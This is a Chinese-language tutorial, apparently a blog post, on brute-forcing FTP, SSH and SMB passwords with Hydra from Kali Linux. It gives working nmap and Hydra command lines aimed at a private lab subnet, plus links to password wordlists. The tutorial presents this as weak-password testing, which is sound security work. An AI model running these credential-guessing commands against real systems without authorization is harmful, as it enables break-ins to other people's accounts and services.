Hydra爆破常见服务密码

Hydra是一款专业的服务密码探测工具,支持FTP、LDAP、MYSQL、Oracle、POP3、SMB、SSH等网络服务,多用于信息安全检查工作中弱口令登陆测试。

实验环境

操作系统:Kali 2019.4

目标网络:192.168.168.0/24

爆破教程

第一步 升级系统、软件版本(可选)

  1. root@kali:~# mv /etc/apt/sources.list /etc/apt/sources.list.bak    
  2. root@kali:~# echo "deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib" > /etc/apt/sources.list    
  3. root@kali:~# apt-get -y update    
  4. root@kali:~# apt-get -y upgrade    
  5. root@kali:~# apt-get -y dist-upgrade     
  6. root@kali:~# apt-get -y clean  

第二步 准备密码字典(可选)

弱密码字典合集包:https://weakpass.com

Kali系统自带字典:/usr/share/wordlists

自定义字典生成脚本:https://github.com/LandGrey/pydictor

第三步 扫描指定网段主机开放的服务(可选)

  1. root@kali:~# nmap 192.168.168.0/24  

第四步 爆破服务(FTP、SSH、SMB)

简易用法:hydra -l 用户名 -P 密码字典 IP地址 服务名称

常见用法:hydra –L 用户名字典 –P 密码字典 t 线程数 –vV 详细显示 –o 生成爆破后的密码记录 –f (爆破成功立即结束) –e n (尝试空密码) IP地址 服务名称

  1. root@kali:~# hydra -l wanghualang -P /wanghualang/hydra/password/tmp.txt 192.168.168.202 smb  
  2. root@kali:~# hydra -l wanghualang -P /wanghualang/hydra/password/tmp.txt 192.168.168.11 ssh  
  3. root@kali:~# hydra -l wanghualang -P /wanghualang/hydra/password/tmp.txt 192.168.168.1 ftp  

Hydra爆破常见服务密码

  • 微信赞助网站
  • weinxin
  • 支付宝赞助网站
  • weinxin
匿名

发表评论

匿名网友 填写信息